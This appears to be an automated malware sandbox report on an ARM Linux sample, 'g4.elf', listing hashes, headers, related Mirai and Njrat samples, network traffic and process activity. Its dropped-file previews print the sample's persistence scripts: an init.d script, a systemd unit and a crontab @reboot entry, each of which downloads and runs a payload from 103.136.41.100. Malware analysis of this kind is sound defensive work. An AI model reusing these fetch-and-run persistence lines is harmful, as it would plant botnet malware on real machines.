                      https://www.facebook.com/share/1A9gt2P1afGet hashmaliciousUnknownBrowse
                      • 104.17.25.14
                      Setup.msiGet hashmaliciousUnknownBrowse
                      • 172.67.162.17
                      3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                      • 172.64.41.3
                      L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                      • 172.67.179.207
                      3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                      • 172.64.41.3
                      NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                      • 172.67.179.207
                      ASGHOSTNETDEg6.elfGet hashmaliciousUnknownBrowse
                      • 77.90.22.16
                      g3.elfGet hashmaliciousUnknownBrowse
                      • 77.90.22.16
                      ppc.elfGet hashmaliciousMiraiBrowse
                      • 5.175.194.122
                      x86.elfGet hashmaliciousMiraiBrowse
                      • 5.175.146.210
                      m1.elfGet hashmaliciousUnknownBrowse
                      • 77.90.22.16
                      m5.elfGet hashmaliciousUnknownBrowse
                      • 77.90.22.16
                      m2.elfGet hashmaliciousUnknownBrowse
                      • 77.90.22.16
                      Vhl3X1aYeU.exeGet hashmaliciousNjratBrowse
                      • 77.90.22.45
                      build.exeGet hashmaliciousRedLineBrowse
                      • 77.90.22.45
                      server.exeGet hashmaliciousNjratBrowse
                      • 77.90.22.45
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      /etc/init.d/hellog4.elfGet hashmaliciousUnknownBrowse
                        Process:/tmp/g4.elf
                        File Type:Bourne-Again shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):617
                        Entropy (8bit):4.73699121422326
                        Encrypted:false
                        SSDEEP:12:i5BpMp5kTMp5Gu+a6zEq26Y2sMG259srxylKNVUdURucTyl:ifpMr8MrPd6QqwMGAsrxy8bp4
                        MD5:C0BDFE9F238AD713156495EA2A224748
                        SHA1:140CCB9B07A53A03B0DA57C8A588C088EC1C0E4F
                        SHA-256:3E84B34A9468D7CB0C1DD0B4025F21F43B1271727DD1BBF006994908D72B61CA
                        SHA-512:B0B7E96E44FB4C3D95737A476273AFC6F01D8C4AE28798AE98C63970C75F2F1E534A21F6705B99E1B145CDFE444982F5E8FFA88D6BD0E6D060A761807F640DA2
                        Malicious:true
                        Joe Sandbox View:
                        • Filename: g4.elf, Detection: malicious, Browse
                        Reputation:low
                        Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 |C 2 R -1157128192..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                        Process:/tmp/g4.elf
                        File Type:troff or preprocessor input, ASCII text
                        Category:dropped
                        Size (bytes):313
                        Entropy (8bit):5.28368958442553
                        Encrypted:false
                        SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOAtMFF5C26VGBg+CIEXwsCBLQmWA4Rv:zb9RZADJiIE+m4Eq26Y2sLLHWrv
                        MD5:E8FA660699DB2AC4047D8DFCC165B2B5
                        SHA1:C2C17589EF087A334E2989D39443A62156BF78BA
                        SHA-256:A0893A909155A2EE8D132B3B3A40E3FBA42589AC842490141B7D9E8964FC9B6B
                        SHA-512:C258B9CDD646447DD11D21DD928E355B0FF0CDF3C2BE965A519D95E287428C6428095551FAF2B77E3E9970AA6A163D12AC6C6AF74B7FD3A8EA90ED0130A64B26
                        Malicious:false
                        Reputation:low
                        Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 |C 2 R -1157128192..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):76
                        Entropy (8bit):3.7627880354948586
                        Encrypted:false
                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                        Process:/tmp/g4.elf
                        File Type:troff or preprocessor input, ASCII text
                        Category:dropped
                        Size (bytes):134
                        Entropy (8bit):4.800827342303799
                        Encrypted:false
                        SSDEEP:3:SH3YFKKtoRFeMPHRC2I+KRIYoSGuVGBg2ZCIUU0XzT9Fw2sePn:SH3otMFF5C26VGBg+CIEX9W5Cn
                        MD5:0A91D2A42E3A40230F13F8AE1ACE835B
                        SHA1:84600ADBE8E19D753BDF02E878413990F9D47168
                        SHA-256:1B5CF37D84868105A7D316172D6D5FAC3C7896AFD590BFB547C2908AD6E11B28
                        SHA-512:2A6A6C514219F49BEB0EA57AEDE2BBBF7EA6ADF277861184AD1A5D4DA934DCC4A74C556B67C62E0B010C69C217510B318B241E411B6456A0CDD2293AAB13BA6C
                        Malicious:true
                        Reputation:low
                        Preview:@rebootrm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                        Process:/tmp/g4.elf
                        File Type:zlib compressed data
                        Category:dropped
                        Size (bytes):259
                        Entropy (8bit):3.482343383791146
                        Encrypted:false
                        SSDEEP:3:FV5IX9FQWUQfvxzVoHXSY/VUWV/FFFQWUQfvxm3/l/VVdf/FVLADsVHI1v/VVdft:OgcB7Y/VUS/FYc8/VjmsVot/VOArB/VF
                        MD5:A4081B8878882933359D0D776002F530
                        SHA1:DCF81EC7D8C3FEEE9E341BFD6E59DAAB398F450B
                        SHA-256:91E3CBA51E45CBDCFEA7B3C6E6C2EBD496135169123FA83512FC18086601C3BE
                        SHA-512:18C82C68DE2846DE158D1224E37C14104954B7327EDDEFAEC4395AE6D89A5ECC810D06186C078780F84288FDEC0D98E9EC20423AB630E60EA39922D25789084E
                        Malicious:false
                        Preview:8000-1b000 r-xp 00000000 fd:00 531566 /tmp/g4.elf.23000-24000 rw-p 00013000 fd:00 531566 /tmp/g4.elf.24000-2a000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                        Process:/usr/bin/crontab
                        File Type:troff or preprocessor input, ASCII text
                        Category:dropped
                        Size (bytes):324
                        Entropy (8bit):5.241534489502274
                        Encrypted:false
                        SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3pMfeiGMQ5UYLtCFt3HYotMFF5C26VGBg+CIK:8Qj7QEuLut83pMmUeHLUHYAEq26Y2sK
                        MD5:55F5CD1A9CAB34E760F62D96880034DC
                        SHA1:AAC043A6DA2972D2787310B971F451B344C5DF26
                        SHA-256:BA6DA3F04BB4516A380F3215363A95511D87FD030BCBF257B735B517988EB069
                        SHA-512:B44642BDEA9C5E7D95FABFCC7DCEE15DB39D551929C15AC306B305A7ABF4A1A4CCEAF25612D641F370FF2546850A2C62DDE817B742B4D3FF3B948FDC3C1E0D5E
                        Malicious:true
                        Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Sun Jan 12 17:12:19 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                        Entropy (8bit):6.101053593735504
                        TrID:
                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                        File name:g4.elf
                        File size:79'764 bytes
                        MD5:1443976ddacfe32b22fe05a76420689c
                        SHA1:6493f3149343976174ad2c1b3389526ec2255276
                        SHA256:3a6669e953a2133f8de9dd431e2aadbe65fd64e8a6ee9508a9e62a303a7ecbc9
                        SHA512:c9aa17bcd0b7f03f8c59636dbc018553ec4bb867e88c5fb1273b703ccc9514421fa18d55280720b64f783bdbf8add325dd0484ce38e174184f949285a7c9a693
                        SSDEEP:1536:fbSnyk49wU591IDhe/+l40O+7MEiAcMbzz8n1gIZgTeg:jJ5OKKcMbzz8SJT
                        TLSH:AA73F756F9819B42C5D402BB7A1E569E33076BA8E3DE3313DD241B24778B62F0F27906
                        File Content Preview:.ELF..............(.....T...4....5......4. ...(.....................l-..l-...............0...0...0..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..5.......0....-.@0....S

                        ELF header

                        Class:ELF32
                        Data:2's complement, little endian
                        Version:1 (current)
                        Machine:ARM
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:UNIX - System V
                        ABI Version:0
                        Entry Point Address:0x8154
                        Flags:0x4000002
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:3
                        Section Header Offset:79244
                        Section Header Size:40
                        Number of Section Headers:13
                        Header String Table Index:12
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .initPROGBITS0x80940x940x100x00x6AX004
                        .textPROGBITS0x80b00xb00x113700x00x6AX0016
                        .finiPROGBITS0x194200x114200x100x00x6AX004
                        .rodataPROGBITS0x194300x114300x193c0x00x2A004
                        .eh_framePROGBITS0x230000x130000x40x00x3WA004
                        .init_arrayINIT_ARRAY0x230040x130040x40x00x3WA004
                        .fini_arrayFINI_ARRAY0x230080x130080x40x00x3WA004
                        .gotPROGBITS0x230100x130100x740x40x3WA004
                        .dataPROGBITS0x230840x130840x4900x00x3WA004
                        .bssNOBITS0x235140x135140x29780x00x3WA004
                        .ARM.attributesARM_ATTRIBUTES0x00x135140x100x00x0001
                        .shstrtabSTRTAB0x00x135240x670x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        LOAD0x00x80000x80000x12d6c0x12d6c6.12480x5R E0x8000.init .text .fini .rodata
                        LOAD0x130000x230000x230000x5140x2e8c6.01960x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 13, 2025 00:12:19.862370968 CET3584153192.168.2.131.1.1.1
                        Jan 13, 2025 00:12:19.867151976 CET53358411.1.1.1192.168.2.13
                        Jan 13, 2025 00:12:19.867240906 CET3584153192.168.2.131.1.1.1
                        Jan 13, 2025 00:12:19.867283106 CET3584153192.168.2.131.1.1.1
                        Jan 13, 2025 00:12:19.872390032 CET53358411.1.1.1192.168.2.13
                        Jan 13, 2025 00:12:19.872441053 CET3584153192.168.2.131.1.1.1
                        Jan 13, 2025 00:12:22.020209074 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:12:22.025134087 CET56255209877.90.22.16192.168.2.13
                        Jan 13, 2025 00:12:22.025279999 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:12:22.035104036 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:12:22.039874077 CET56255209877.90.22.16192.168.2.13
                        Jan 13, 2025 00:12:53.479043007 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:12:53.483906984 CET56255209877.90.22.16192.168.2.13
                        Jan 13, 2025 00:13:24.198863029 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:13:24.203707933 CET56255209877.90.22.16192.168.2.13
                        Jan 13, 2025 00:13:33.123050928 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:13:33.129317999 CET56255209877.90.22.16192.168.2.13
                        Jan 13, 2025 00:13:33.308451891 CET56255209877.90.22.16192.168.2.13
                        Jan 13, 2025 00:13:33.308535099 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:14:05.158926964 CET520985625192.168.2.1377.90.22.16
                        Jan 13, 2025 00:14:05.163923025 CET56255209877.90.22.16192.168.2.13

                        System Behavior

                        Start time (UTC):23:12:12
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:/tmp/g4.elf
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:18
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:18
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:18
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:18
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/systemctl
                        Arguments:systemctl daemon-reload
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/systemctl
                        Arguments:systemctl start hello.service
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/crontab
                        Arguments:crontab /tmp/crontab.tmp
                        File size:43720 bytes
                        MD5 hash:66e521d421ac9b407699061bf21806f5

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:19
                        Start date (UTC):12/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):23:12:20
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:20
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:20
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:20
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:20
                        Start date (UTC):12/01/2025
                        Path:/tmp/g4.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):23:12:14
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):23:12:15
                        Start date (UTC):12/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):23:12:15
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):23:12:18
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):23:12:18
                        Start date (UTC):12/01/2025
                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File size:22760 bytes
                        MD5 hash:3633b075f40283ec938a2a6a89671b0e